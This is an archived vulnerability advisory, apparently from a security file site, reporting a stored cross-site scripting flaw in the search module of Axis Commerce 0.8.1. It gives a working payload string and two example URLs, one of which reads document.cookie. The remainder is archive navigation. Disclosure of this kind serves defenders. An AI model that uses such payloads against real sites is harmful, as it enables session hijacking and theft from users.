Axis Commerce 0.8.1 Cross Site Scripting

Axis Commerce 0.8.1 Cross Site Scripting: Posted Aug 19, 2011; Authored by Eyup CELIK; Axis Commerce versions 0.8.1 and below suffer from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | b949d754fb0fa2badd831fc7a620abbd08322c6d64c91d1d4382257f0690234e; Download | Favorite | View

Axis Commerce 0.8.1 Cross Site Scripting

# Exploit Title: Axis Commerce (E-Commerce System) Stored XSS
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
# Version: 0.8.1 and previus
# Tested on: Apache (For Windows)

ISSUE

Vulnerable Modules => Search Module

XSS can be done using the command input

Example Code: " onmouseover=prompt(XSS Code) bad="

Example:

http://localhost/axis-0.7.0.4/search/result?q="  
onmouseover=prompt(906764) bad="

http://localhost/axis-0.7.0.4/search/result?q="  
onmouseover=prompt(document.cookie) bad="


Thanks,


Eyüp ÇEL?K
Bilgi Teknolojileri Güvenlik Uzman?
http://www.eyupcelik.com.tr

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Axis Commerce 0.8.1 Cross Site Scripting

Axis Commerce 0.8.1 Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Axis Commerce 0.8.1 Cross Site Scripting

Share This

Axis Commerce 0.8.1 Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems